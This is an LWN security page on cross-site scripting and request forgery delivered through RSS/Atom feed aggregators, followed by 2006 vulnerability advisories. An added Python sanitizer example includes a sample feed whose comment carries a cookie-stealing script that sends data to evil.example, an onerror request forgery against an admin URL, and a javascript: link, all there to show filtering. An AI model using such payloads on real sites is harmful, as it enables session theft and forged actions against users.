Brief items

Really Simple Syndication (RSS) and Atom are the two formats used to provide syndicated content, and there are a variety of web-based and standalone clients that can read RSS/Atom feeds and display them to users. These clients often do not properly filter the content they receive and can be susceptible to various attacks.
Both RSS and Atom are XML-based formats that carry the various elements of the content being syndicated: title, description, story link, and so on. A client program, often known as an 'aggregator', lets the user subscribe to feeds and checks them periodically for new content. The aggregator then displays that information and the user can choose content items to look at more closely. Because much of the content comes from websites, aggregators typically interpret and render HTML found in the feed data. That is what provides the means for attacks.
Malicious content for cross-site scripting (XSS) or cross-site request forgery (XSRF) can be inserted into any of the textual portions of the feed data. If the aggregator does not sufficiently filter the received data, it renders that content in the user's context, with the user's cookies and sessions available to it. Web-based aggregators are particularly susceptible, since they run in a browser with all of the normal browser capabilities, but standalone clients often include browser-like rendering or will start a browser to follow feed links.
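To make the "sufficiently filter" requirement concrete, here is an added example (not code from the article, nor from any aggregator it mentions) of the allow-list approach an aggregator should take before rendering feed text: parse the feed, pull out the HTML carried in each description, keep only a small set of formatting tags, keep only absolute http/https/mailto links, and drop everything else. The RSS document, the comment texts and the blog.example and evil.example hosts are constructed for the demonstration.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed RSS 2.0 comment feed (not a real site). RSS carries HTML inside
# <description> as escaped text, so the XML parser hands the aggregator raw
# HTML to render. The second comment is the attacker's post: a script that
# steals cookies, an image whose onerror handler fires a request in the
# reader's session (XSRF), and a javascript: link.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Comments on post 1</title>
<item>
 <title>Nice post</title>
 <link>http://blog.example/post/1#c1</link>
 <description>&lt;p&gt;Agreed, see &lt;a href="http://blog.example/x"&gt;this&lt;/a&gt;.&lt;/p&gt;</description>
</item>
<item>
 <title>re: Nice post</title>
 <link>http://blog.example/post/1#c2</link>
 <description>&lt;p&gt;Hi&lt;/p&gt;&lt;script&gt;document.location='http://evil.example/?c='+document.cookie&lt;/script&gt;&lt;img src="x" onerror="fetch('http://blog.example/admin/delete?id=1')"&gt;&lt;a href="javascript:alert(1)"&gt;click&lt;/a&gt;</description>
</item>
</channel></rss>"""

# Everything not listed here is dropped: no script/style/iframe/object/form,
# no img (image loads leak the reader's address and carry onerror handlers),
# and no attribute at all except an allow-listed href on <a>.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "code", "pre", "ul", "ol",
                "li", "br", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def safe_url(value):
    # Browsers tolerate whitespace and control characters inside "javascript:",
    # so squeeze those out before looking at the scheme.
    compact = "".join(c for c in value if c.isprintable() and not c.isspace())
    return compact.lower().startswith(SAFE_SCHEMES)


class FeedHTMLSanitizer(HTMLParser):
    """Rebuild a fragment from the allow-list; comments and unknown markup vanish."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.stack, self.removed = [], [], []
        self.skip_depth = 0   # >0 while inside <script>/<style>: drop the text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.removed.append(tag)
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.removed.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name in ALLOWED_ATTRS.get(tag, ()) and safe_url(value):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
            else:
                self.removed.append(f"{tag}@{name}")
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.stack:
            return
        # Close anything left open inside this element, then the element itself,
        # so one comment cannot leave a tag open that swallows the rest of the page.
        while self.stack:
            open_tag = self.stack.pop()
            self.out.append(f"</{open_tag}>")
            if open_tag == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    """Return (clean_html, removed): removed lists the dropped tags/attributes."""
    p = FeedHTMLSanitizer()
    p.feed(fragment)
    p.close()
    p.out.extend(f"</{t}>" for t in reversed(p.stack))   # close dangling tags
    return "".join(p.out), p.removed


def parse_feed(xml_text):
    """Pull title/link/description out of an RSS 2.0 document. Feeds are untrusted
    XML; a real aggregator should parse them with defusedxml rather than stdlib."""
    root = ET.fromstring(xml_text)
    return [{"title": item.findtext("title", ""),
             "link": item.findtext("link", ""),
             "description": item.findtext("description", "")}
            for item in root.iter("item")]


def render_items(items):
    """Build the HTML the aggregator shows: every feed field is escaped or
    sanitized, never inserted into the page as-is."""
    rows = []
    for it in items:
        link = it["link"] if safe_url(it["link"]) else "#"
        body, _ = sanitize_html(it["description"])
        rows.append(f'<h2><a href="{html.escape(link)}">{html.escape(it["title"])}</a></h2>\n{body}')
    return "\n".join(rows)


if __name__ == "__main__":
    print(render_items(parse_feed(SAMPLE_RSS)))
```

Run as-is, the first comment renders unchanged while the second is reduced to `<p>Hi</p><a>click</a>`; the sanitizer reports the script element, the img element and the javascript: href it threw away. The point is the direction of the check: an allow-list of tags and attributes, applied to every text field the feed supplies, rather than a deny-list of known-bad strings. A production aggregator would reach for a maintained sanitizer library and a hardened XML parser, but the policy it enforces should look like this one.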
While it is certainly possible, it is unlikely that feed providers will directly put malicious content in their own feeds; they are too easy to track down. A much more likely scenario is feeds that syndicate user generated content, like comment feeds on blogs or sites like LWN (syndication information here). Depending on how much filtering the site does, it may end up propagating that content through its syndication feed. A malicious user could, anonymously at many sites, post a comment containing a script or a forged request and effectively co-opt the site into spreading it. A popular site could spread it very widely, even if only a small percentage of its readers' aggregators were affected.
In addition, many popular sites are 're-syndicated': their feeds are included in the feeds of aggregation sites. A security site, for instance, might display the feeds of several other security sites and include that content in its own feed. This provides for a virus-like propagation, where a malicious user can inject content once and have it start showing up in multiple feeds. Some sites will also collect mailing list postings or descriptions of new content available on peer-to-peer networks and add them to their syndication feed. This provides even more ways for someone to anonymously inject malicious content.
Bob Auger presented his findings (PDF) on this subject at the Black Hat 2006 conference. He provides several plausible attack scenarios as well as examples of RSS and Atom data that demonstrate these techniques.
The potential for malicious content in any data that originates elsewhere really cannot be overstated. The tools we use on a day to day basis need to be aware of this potential and act appropriately. It may seem like security articles tediously repeat the same 'filter input data' mantra over and over, but here is yet another place where proper filtering has been overlooked.
Package(s): bind
CVE #(s): CVE-2006-4095 CVE-2006-4096
Created: September 7, 2006    Updated: February 1, 2007
Description: BIND has two denial of service vulnerabilities. On recursive servers, queries for SIG records trigger an assertion failure if more than one RRset is returned (CVE-2006-4095). An INSIST failure can be triggered by sending a large number of recursive queries (CVE-2006-4096).

Package(s): flash-plugin
CVE #(s): CVE-2006-3311 CVE-2006-3587 CVE-2006-3588
Created: September 13, 2006    Updated: October 5, 2006
Description: Security issues were discovered in the Adobe Flash Player. It may be possible to execute arbitrary code on a victim's machine if the victim opens a malicious Adobe Flash file.

Created: September 13, 2006    Updated: September 13, 2006
Description: A flaw has been found in isakmpd, OpenBSD's implementation of the Internet Key Exchange protocol, that caused Security Associations to be created with a replay window of 0 when isakmpd was acting as the responder during SA negotiation. This could allow an attacker to re-inject sniffed IPsec packets, which would not be checked against the replay counter.

Package(s): mailman
CVE #(s): CVE-2006-2941 CVE-2006-3636
Created: September 8, 2006    Updated: October 23, 2006
Description: A flaw was found in the way Mailman handled MIME multipart messages. An attacker could send a carefully crafted MIME multipart email message to a mailing list run by Mailman which caused that particular mailing list to stop working. (CVE-2006-2941)
Several cross-site scripting (XSS) issues were found in Mailman. An attacker could exploit these issues to perform cross-site scripting attacks against the Mailman administrator. (CVE-2006-3636)

Package(s): php
CVE #(s): CVE-2006-4481 CVE-2006-4484 CVE-2006-4485
Created: September 8, 2006    Updated: June 13, 2008
Description: The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481).
A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484).
The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485).

Package(s): xorg-x11 xfree86
CVE #(s): CVE-2006-3739 CVE-2006-3740
Created: September 12, 2006    Updated: December 14, 2006
Description: iDefense reported two integer overflow flaws in the way the X.org server processed CID font files. A malicious authorized client could exploit this issue to cause a denial of service (crash) or potentially execute arbitrary code with root privileges on the X.org server.

Page editor: Jonathan Corbet
Copyright © 2006, Eklektix, Inc.